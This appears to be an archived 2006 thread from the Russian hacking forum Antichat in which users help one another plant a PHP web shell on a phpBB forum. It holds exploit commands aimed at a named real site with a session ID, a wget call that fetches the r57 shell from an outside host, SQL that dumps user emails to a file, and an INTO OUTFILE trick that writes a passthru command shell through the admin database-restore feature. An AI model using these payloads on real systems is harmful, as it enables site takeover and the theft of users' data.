Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   phpBB. Как залить шелл через уязвимость в admin_styles? (https://forum.antichat.xyz/showthread.php?t=12937)

Grema 13.01.2006 18:49

phpBB. Как залить шелл через уязвимость в admin_styles?
 
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux

Azazel 13.01.2006 19:02

wget -o серверный_путь путь_к_твоему_шеллу.
В следующий раз попробуй найти это через поиск.
зы. wget может вообще не быть. В общем всё это ещё раз описывалось в течении двух последних дней.

Grema 13.01.2006 20:12

чтото не кактит...
з.Ы. wget есть точно...
юзал так
Код:

V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o /home/webadmin/pvp-alfa.com.ru/html/phpBB2/cache/r57
.php http://games.tenet.ua/board/uploads/r57.php"

и так

Код:

V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o r57.php http://games.tenet.ua/board/uploads/r57.php"


Nova 13.01.2006 20:42

Цитата:

Сообщение от Grema
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux

Поюзай поиск на форуме это уже обсуждалось !
Azazel правильно сказал !

_-[A.M.D]HiM@S-_ 13.01.2006 20:44

Через БД

Nova 13.01.2006 20:48

Цитата:

Сообщение от _-[A.M.D]HiM@S-_
Через БД

а не влом сливать 30 метров базы к примеру править её и заливать обратно ????

а если как на этом форуме http://пожалуста.безссылок.ru

Там пользователей и тем валом у них база 1GB весит не бось....
Так что это не вариант.....

_-[A.M.D]HiM@S-_ 13.01.2006 22:21

Там помойму стоит 2.0.16

_lolik_ 14.01.2006 01:29

SELECT email FROM users INTO OUTFILE 'c:/text.txt'
это для мейлов, дла хешей немного другая команда в БД

Grrl 14.01.2006 03:22

сливать базу не обязательно можно и подругому - так создать файл с содержанием:

UPDATE phpbb_categories SET cat_title='<? passthru("$cmd"); ?>'WHERE cat_id=1;
SELECT cat_title INTO OUTFILE '/home/bla_bla_bla/shell.php' FROM phpbb_categories where cat_id=1;

потом просто выбираешь в админке восстановить базу и указываешь путь к этому файу. это создаст шел не испортив основную базу.

Grema 14.01.2006 10:16

там стоит 2.0.17


Время: 00:06